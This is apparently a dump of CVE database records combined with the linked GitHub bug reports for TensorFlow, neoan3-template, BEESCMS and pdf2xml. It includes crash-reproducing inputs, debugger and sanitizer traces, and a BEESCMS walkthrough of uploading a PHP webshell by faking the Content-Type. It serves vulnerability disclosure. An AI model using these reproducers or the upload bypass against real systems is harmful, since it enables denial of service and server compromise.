[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/6d94002a09711d297dbba90390d5482b76113899" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46889" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46912" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xrqm-fpgr-6hhx" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/6d94002a09711d297dbba90390d5482b76113899" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46889" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46912" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xrqm-fpgr-6hhx" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "0E596567-6F67-4880-8EC4-CB262BF02E0D", "versionEndExcluding": "2.4.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.4.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910", "versionEndExcluding": "2.5.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.5.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "5D68D8D1-DB27-4395-9D3D-2BED901B852C", "versionEndExcluding": "2.6.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.6.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:2.7.0:rc0:*:*:*:*:*:*", "matchCriteriaId": "A58EDA5C-66D6-46F1-962E-60AFB7C784A7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:2.7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "89522760-C2DF-400D-9624-626D8F160CBA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "681" ]
681
https://github.com/tensorflow/tensorflow/issues/46889
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "tensorflow", "tensorflow" ]
**System information** - Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No - OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04 - Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A - TensorFlow installed from (source or binary): binary - TensorFlow version (use command below):2.1.0 - Python version:3.7.6 - Bazel version (if compiling from source):N/A - GCC/Compiler version (if compiling from source):N/A - CUDA/cuDNN version:N/A - GPU model and memory:N/A - **Describe the current behavior** `tf.keras.backend.arange` crash (abort) when `start` is large **Describe the expected behavior** expect no crash **Standalone code to reproduce the issue** ~~~python import tensorflow as tf tf.keras.backend.arange(start=1e+38) ~~~ Output: ~~~python 2021-02-03 16:53:49.181545: F tensorflow/core/framework/tensor_shape.cc:187] Non-OK-status: InitDims(dim_sizes) status: Internal: Expected shape dimensions to be non-negative, got -9223372036854775808 Aborted (core dumped) ~~~
tf.keras.backend.arange crash (abort) when start is large
https://api.github.com/repos/tensorflow/tensorflow/issues/46889/comments
4
2021-02-03T16:54:54Z
2021-08-30T20:46:03Z
https://github.com/tensorflow/tensorflow/issues/46889
800,513,778
46,889
2,768
CVE-2021-41202
2021-11-05T22:15:08.323
TensorFlow is an open source platform for machine learning. In affected versions while calculating the size of the output within the `tf.range` kernel, there is a conditional statement of type `int64 = condition ? int64 : double`. Due to C++ implicit conversion rules, both branches of the condition will be cast to `double` and the result would be truncated before the assignment. This result in overflows. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/6d94002a09711d297dbba90390d5482b76113899" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46889" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46912" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xrqm-fpgr-6hhx" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/commit/6d94002a09711d297dbba90390d5482b76113899" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46889" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/issues/46912" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xrqm-fpgr-6hhx" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "0E596567-6F67-4880-8EC4-CB262BF02E0D", "versionEndExcluding": "2.4.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.4.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910", "versionEndExcluding": "2.5.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.5.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "5D68D8D1-DB27-4395-9D3D-2BED901B852C", "versionEndExcluding": "2.6.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.6.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:2.7.0:rc0:*:*:*:*:*:*", "matchCriteriaId": "A58EDA5C-66D6-46F1-962E-60AFB7C784A7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:google:tensorflow:2.7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "89522760-C2DF-400D-9624-626D8F160CBA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "681" ]
681
https://github.com/tensorflow/tensorflow/issues/46912
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "tensorflow", "tensorflow" ]
**System information** - Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No - OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04 - Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A - TensorFlow installed from (source or binary): binary - TensorFlow version (use command below):2.1.0 - Python version:3.7.6 - Bazel version (if compiling from source):N/A - GCC/Compiler version (if compiling from source):N/A - CUDA/cuDNN version:N/A - GPU model and memory:N/A **Describe the current behavior** `tf.sparse.eye` crashes(aborts) when `num_rows` contains large number **Describe the expected behavior** expect an exception message if the input unexpected instead of crash. **Standalone code to reproduce the issue** ~~~python import tensorflow as tf import numpy as np tf.sparse.eye(num_rows=9223372036854775807, num_columns=None) ~~~ Output ~~~python 2021-02-04 04:36:57.184236: F tensorflow/core/framework/tensor_shape.cc:345] Check failed: size >= 0 (-9223372036854775808 vs. 0) Aborted (core dumped) ~~~
`tf.sparse.eye` crashes(aborts) when num_rows contains large number
https://api.github.com/repos/tensorflow/tensorflow/issues/46912/comments
4
2021-02-04T04:39:54Z
2021-08-19T04:41:31Z
https://github.com/tensorflow/tensorflow/issues/46912
800,924,135
46,912
2,769
CVE-2021-41170
2021-11-08T19:15:07.640
neoan3-apps/template is a neoan3 minimal template engine. Versions prior to 1.1.1 have allowed for passing in closures directly into the template engine. As a result values that are callable are executed by the template engine. The issue arises if a value has the same name as a method or function in scope and can therefore be executed either by mistake or maliciously. In theory all users of the package are affected as long as they either deal with direct user input or database values. A multi-step attack on is therefore plausible. Version 1.1.1 has addressed this vulnerability. Unfortunately only working with hardcoded values is safe in prior versions. As this likely defeats the purpose of a template engine, please upgrade.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/sroehrl/neoan3-template/commit/4a2c9570f071d3c8f4ac790007599cba20e16934" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/sroehrl/neoan3-template/issues/8" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/sroehrl/neoan3-template/security/advisories/GHSA-3v56-q6r6-4gcw" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/sroehrl/neoan3-template/commit/4a2c9570f071d3c8f4ac790007599cba20e16934" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/sroehrl/neoan3-template/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/sroehrl/neoan3-template/security/advisories/GHSA-3v56-q6r6-4gcw" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:neoan:neoan3-template:*:*:*:*:*:*:*:*", "matchCriteriaId": "70999503-021D-444B-95AD-548CE2C0E680", "versionEndExcluding": "1.1.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "732" ]
732
https://github.com/sroehrl/neoan3-template/issues/8
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "sroehrl", "neoan3-template" ]
In the template evaluation, closures are evaluated based on whether a value is callable within the current scope. In theory, one could create a multi-step attack by storing particular values into the database that are known to be eventually rendered by the template engine. would the value of such a key happen to be a callable, one could execute global or local functions & methods. While it is unclear how one could use this to exploit neoan3, this constitutes a security concern.
Closure injection has a vulnerability
https://api.github.com/repos/sroehrl/neoan3-template/issues/8/comments
0
2021-10-21T23:24:03Z
2021-10-21T23:48:25Z
https://github.com/sroehrl/neoan3-template/issues/8
1,033,019,897
8
2,770
CVE-2020-23572
2021-11-08T21:15:07.527
BEESCMS v4.0 was discovered to contain an arbitrary file upload vulnerability via the component /admin/upload.php. This vulnerability allows attackers to execute arbitrary code via a crafted image file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/source-trace/beescms/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/source-trace/beescms/issues/6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:beescms:beescms:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "25C27AEE-DD4E-4006-8DD1-E4A6160F4D43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/source-trace/beescms/issues/6
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "source-trace", "beescms" ]
Let's take a look at the code ![图片](https://user-images.githubusercontent.com/38186621/84000998-58e8db00-a998-11ea-8bab-2f07c0d04447.png) Because the system does not strictly filter and restrict the pictures uploaded by users, resulting in file upload vulnerabilities. From the code, it can be seen that only the size of the picture and the Content-Type and so on are verified during the upload, so only need to modify the Content-Type to bypass Upload. After the administrator logged in, open the following one page. ![图片](https://user-images.githubusercontent.com/38186621/84001009-60a87f80-a998-11ea-82da-22bc45fa4d54.png) Upload php.php and grab the package to modify the Content-Type to "image/jpg" ![图片](https://user-images.githubusercontent.com/38186621/84001034-6aca7e00-a998-11ea-94ec-f6d386d4bd50.png) Then we can see that php.php was successfully uploaded. Then we access the uploaded file ![图片](https://user-images.githubusercontent.com/38186621/84001051-76b64000-a998-11ea-9043-82a394ec8e0b.png)
There is a file upload vulnerability so that the webshell can be obtained
https://api.github.com/repos/source-trace/beescms/issues/6/comments
0
2020-06-08T06:58:15Z
2020-06-08T06:58:15Z
https://github.com/source-trace/beescms/issues/6
634,257,773
6
2,771
CVE-2020-23872
2021-11-10T22:15:07.470
A NULL pointer dereference in the function TextPage::restoreState of pdf2xml v2.0 allows attackers to cause a denial of service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kermitt2/pdf2xml/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kermitt2/pdf2xml/issues/10" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:science-miner:pdf2xml:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "F0D977B7-4BC0-476D-975B-238D77F69414", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/kermitt2/pdf2xml/issues/10
[ "Exploit", "Third Party Advisory" ]
github.com
[ "kermitt2", "pdf2xml" ]
$ gdb ./pdf2xml (gdb) r 01-NULL-pointer-dereference-TextPage-restoreState test.xml [00-NULL-pointer-dereference-TextPage-restoreState.pdf](https://github.com/kermitt2/pdf2xml/files/4876379/00-NULL-pointer-dereference-TextPage-restoreState.pdf) Program received signal SIGSEGV, Segmentation fault. 0x000000000040e29b in TextPage::restoreState (state=0x7a02a0, this=0x7a2100) at /home/test/pdf2xml/src/XmlOutputDev.cc:2765 2765 idCur = idStack.top(); (gdb) bt #0 0x000000000040e29b in TextPage::restoreState (state=0x7a02a0, this=0x7a2100) at /home/test/pdf2xml/src/XmlOutputDev.cc:2765 #1 XmlOutputDev::restoreState (this=<optimized out>, state=0x7a02a0) at /home/test/pdf2xml/src/XmlOutputDev.cc:4333 #2 0x000000000049983b in Gfx::execOp (this=this@entry=0x7a0140, cmd=cmd@entry=0x7fffffffdf20, args=args@entry=0x7fffffffdf30, numArgs=numArgs@entry=0) at /home/test/pdf2xml/xpdf/xpdf/Gfx.cc:834 #3 0x0000000000499a4f in Gfx::go (this=this@entry=0x7a0140, topLevel=topLevel@entry=1) at /home/test/pdf2xml/xpdf/xpdf/Gfx.cc:709 #4 0x0000000000499e66 in Gfx::display (this=this@entry=0x7a0140, objRef=objRef@entry=0x7a0120, topLevel=topLevel@entry=1) at /home/test/pdf2xml/xpdf/xpdf/Gfx.cc:642 #5 0x0000000000465f23 in Page::displaySlice (this=0x7a00f0, out=0x79eae0, out@entry=0x0, hDPI=72, hDPI@entry=0, vDPI=72, vDPI@entry=3.9364818670782154e-317, rotate=<optimized out>, rotate@entry=4612527, useMediaBox=useMediaBox@entry=1, crop=crop@entry=1, sliceX=sliceX@entry=-1, sliceY=-1, sliceW=-1, sliceH=-1, printing=0, abortCheckCbk=0x0, abortCheckCbkData=0x0) at /home/test/pdf2xml/xpdf/xpdf/Page.cc:360 #6 0x00000000004661af in Page::display (this=<optimized out>, out=out@entry=0x0, hDPI=hDPI@entry=0, vDPI=vDPI@entry=3.9364818670782154e-317, rotate=rotate@entry=4612527, useMediaBox=useMediaBox@entry=1, crop=crop@entry=1, printing=printing@entry=0, abortCheckCbk=0x0, abortCheckCbkData=0x0) at /home/test/pdf2xml/xpdf/xpdf/Page.cc:310 #7 0x0000000000466ffb in PDFDoc::displayPage (this=this@entry=0x799328, out=0x0, out@entry=0x79eae0, page=page@entry=1, hDPI=0, hDPI@entry=72, vDPI=3.9364818670782154e-317, vDPI@entry=72, rotate=4612527, rotate@entry=0, useMediaBox=useMediaBox@entry=1, crop=crop@entry=1, printing=0, abortCheckCbk=0x0, abortCheckCbkData=0x0) at /home/test/pdf2xml/xpdf/xpdf/PDFDoc.cc:386 #8 0x000000000046707e in PDFDoc::displayPages (this=this@entry=0x799328, out=out@entry=0x79eae0, firstPage=firstPage@entry=1, lastPage=lastPage@entry=1, hDPI=hDPI@entry=72, vDPI=vDPI@entry=72, rotate=rotate@entry=0, useMediaBox=useMediaBox@entry=1, crop=1, printing=0, abortCheckCbk=0x0, abortCheckCbkData=0x0) at /home/test/pdf2xml/xpdf/xpdf/PDFDoc.cc:398 #9 0x000000000040d36b in PDFDocXrce::displayPages (this=this@entry=0x799320, out=out@entry=0x79eae0, docrootA=docrootA@entry=0x0, firstPage=1, lastPage=1, hDPI=hDPI@entry=72, vDPI=vDPI@entry=72, rotate=rotate@entry=0, useMediaBox=1, crop=1, doLinks=0, abortCheckCbk=0x0, abortCheckCbkData=0x0) at /home/test/pdf2xml/src/PDFDocXrce.cc:34 #10 0x0000000000405589 in main (argc=2, argv=<optimized out>) at /home/test/pdf2xml/src/pdftoxml.cc:409 (gdb) x/10i $rip => 0x40e29b <XmlOutputDev::restoreState(GfxState*)+171>: mov 0x1fc(%rcx),%esi 0x40e2a1 <XmlOutputDev::restoreState(GfxState*)+177>: mov %esi,0x180(%rbx) 0x40e2a7 <XmlOutputDev::restoreState(GfxState*)+183>: callq 0x402fa0 <_ZdlPv@plt> 0x40e2ac <XmlOutputDev::restoreState(GfxState*)+188>: mov 0x178(%rbx),%rdi 0x40e2b3 <XmlOutputDev::restoreState(GfxState*)+195>: lea -0x8(%rdi),%r8 0x40e2b7 <XmlOutputDev::restoreState(GfxState*)+199>: mov %r8,0x178(%rbx) 0x40e2be <XmlOutputDev::restoreState(GfxState*)+206>: mov -0x8(%rdi),%r9 0x40e2c2 <XmlOutputDev::restoreState(GfxState*)+210>: lea 0x200(%r9),%r10 0x40e2c9 <XmlOutputDev::restoreState(GfxState*)+217>: mov %r9,0x168(%rbx) 0x40e2d0 <XmlOutputDev::restoreState(GfxState*)+224>: add $0x1fc,%r9 (gdb) p/x $rcx $1 = 0x0 ref: https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml
NULL-pointer-dereference-TextPage-restoreState
https://api.github.com/repos/kermitt2/pdf2xml/issues/10/comments
0
2020-07-06T01:52:41Z
2020-07-06T01:52:41Z
https://github.com/kermitt2/pdf2xml/issues/10
651,195,343
10
2,772
CVE-2020-23873
2021-11-10T22:15:09.223
pdf2xml v2.0 was discovered to contain a heap-buffer overflow in the function TextPage::dump.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/122.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kermitt2/pdf2xml/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/122.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kermitt2/pdf2xml/issues/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:science-miner:pdf2xml:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "F0D977B7-4BC0-476D-975B-238D77F69414", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/kermitt2/pdf2xml/issues/11
[ "Exploit", "Third Party Advisory" ]
github.com
[ "kermitt2", "pdf2xml" ]
$ ./pdf2xml 01-Heap-buffer-overflow-TextPage-dump.pdf test.xml ================================================================= ==36659==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200004405a at pc 0x7fb7e473d9f5 bp 0x7ffc8a9d8c60 sp 0x7ffc8a9d83f0 WRITE of size 11 at 0x60200004405a thread T0 #0 0x7fb7e473d9f4 in __interceptor_vsprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x619f4) #1 0x7fb7e473dcc9 in __interceptor_sprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x61cc9) #2 0x419e84 in TextPage::dump(int, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:2001 #3 0x428ec5 in XmlOutputDev::endPage() /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:4155 #4 0x48e309 in Gfx::~Gfx() /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Gfx.cc:591 #5 0x45633a in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Page.cc:394 #6 0x45653e in Page::display(OutputDev*, double, double, int, int, int, int, int (*)(void*), 